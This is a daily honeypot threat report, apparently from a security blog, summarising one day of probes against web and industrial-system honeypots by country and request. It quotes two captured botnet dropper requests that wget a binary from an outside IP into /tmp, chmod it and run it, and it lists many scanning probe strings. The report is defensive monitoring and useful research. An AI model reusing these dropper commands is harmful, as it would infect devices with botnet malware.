Skip to main content
  1. Daily-Posts/

Report: 2025-04-26

·589 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-26
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 61 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2169 requests were recorded during the day, originating from 2 different countries, with a peak of 458 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
USGermany
USGermany
USGermany
DESingapore
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
124.220.11.157GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11
122.97.137.11827;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
910POST /boaform/webLogin HTTP/1.1
138@RSYTCD: 29
158\x01\xC2\x00\x00\x00\x04\x00\x00\xB6\x01\x00\x00SQLDB2RA\x00\x01\x00\x00\x04\x01\x01\x00\x05\x00\x1D\x00\x88\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x08\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00@\x00\x00\x00@\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x02\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x03\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x03\x00\x00\x80\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F
1680:\x02\x04\x03<\xDAS`2\x02\x01\x03\x04\x17cn=mfsaidmxpwgmjbwdczkf\x80\x14mfsaidmxpwgmjbwdczkf
248\x80\x00\x00(\x10l\x8E\xB9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA3\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
1353GET /protocol.js HTTP/1.1
2291GET /api/bin/440393?time=1745678102189039830 HTTP/1.1
2321GET /tAo9 HTTP/1.1
2331GET /mo8H HTTP/1.1
2341POST /api/user/binLookup?time=1745675229922714312 HTTP/1.1
2351GET /api/bin/440393?time=1745675229513365807 HTTP/1.1
2361GET /config/index?time=1745673646022802997 HTTP/1.1
2501GET /VtCP HTTP/1.1
2511GET /9tYV HTTP/1.1
2521GET /global.xml HTTP/1.1
2541GET /global.ini HTTP/1.1
2551GET /frontend_dev.php HTTP/1.1
2571GET /environment.rb HTTP/1.1
2631POST /api/user/binLookup?time=1745639991360402506 HTTP/1.1
2641GET /api/bin/440393?time=1745639990863567631 HTTP/1.1
2651GET /config/index?time=1745639002513625107 HTTP/1.1
2711GET /admin/jregs.html?idC/205.185.124.1 HTTP/1.1
2861GET /Odin/http/call1745703509 HTTP/1.1
2871GET /OdinHttpCall1745703509 HTTP/1.1
2881GET /odinhttpcall1745703509 HTTP/1.1
2891GET /api/bin/440393?time=1745646206016949498 HTTP/1.1
2911GET /config/index?time=1745643002560262423 HTTP/1.1
2941\x04\x01\x01\xBB@\xE9\xA2hadm:12345\x00
2951\x04\x01\x01\xBB@\xE9\xA2g\x00
3071POST /api/user/binLookup?time=1745646206516345019 HTTP/1.1
3101POST /xmlrpc.php HTTP/1.1
3271\x00\x0E8\xA5\xD3d
3281\x00\x0E\x08\xA5\xD3d
3321GET /register/ HTTP/1.1
3571GET /api/bin/440393?time=1745680924822974751 HTTP/1.1
3581GET /config/index?time=1745677931951464338 HTTP/1.1
3591POST /api/user/binLookup?time=1745674833779828247 HTTP/1.1
3601GET /api/bin/440393?time=1745674833265012472 HTTP/1.1
3611GET /config/index?time=1745673899887745266 HTTP/1.1
3771guage=0
3811GET /Odin/http/call1745661278 HTTP/1.1
3821GET /OdinHttpCall1745661278 HTTP/1.1
3831GET /odinhttpcall1745661278 HTTP/1.1
3881POST /api/user/binLookup?time=1745680925321167535 HTTP/1.1
3931GET /api/bin/440393?time=1745673888744267888 HTTP/1.1
3941GET /config/index?time=1745673175431253566 HTTP/1.1
4061POST /api/user/binLookup?time=1745677449939887845 HTTP/1.1
4071GET /config/index?time=1745675004300204309 HTTP/1.1
4081POST /api/user/binLookup?time=1745673889336769337 HTTP/1.1
4211GET /api/bin/440393?time=1745638763636972062 HTTP/1.1
4231GET /config/index?time=1745638215863994912 HTTP/1.1
4391GET /Odin/http/call1745651447 HTTP/1.1
4401GET /OdinHttpCall1745651447 HTTP/1.1
4411GET /odinhttpcall1745651447 HTTP/1.1
4471GET /Odin/http/call1745644756 HTTP/1.1
4481GET /OdinHttpCall1745644756 HTTP/1.1
4491GET /odinhttpcall1745644756 HTTP/1.1
4511GET /config/index?time=1745639866649991519 HTTP/1.1
4521POST /api/user/binLookup?time=1745638764419223379 HTTP/1.1
4631GET /-env HTTP/1.1
4681POST /api/user/binLookup?time=1745678102589735975 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0458GB
1351DE
2334US
3204NL
4179SC
5143CN
6117PL
768BG
849BE
943HK
1042UA
1122JP
1218FR
1316TR
1415SG
1514ZA
1610IN
1710KR
1810CA
199AO
206PT
216CH
226IL
235VN
244GH
254NG
263LT
273PA
282MC
292IT
302BR
312ZM
322TN
332KW
342VE
351RU
361ID
371TW
381AE
391EE
401GE

Related

Report: 2025-04-25
·529 words
Repport Daily
Report: 2025-04-24
·358 words
Repport Daily
Report: 2025-04-23
·512 words
Repport Daily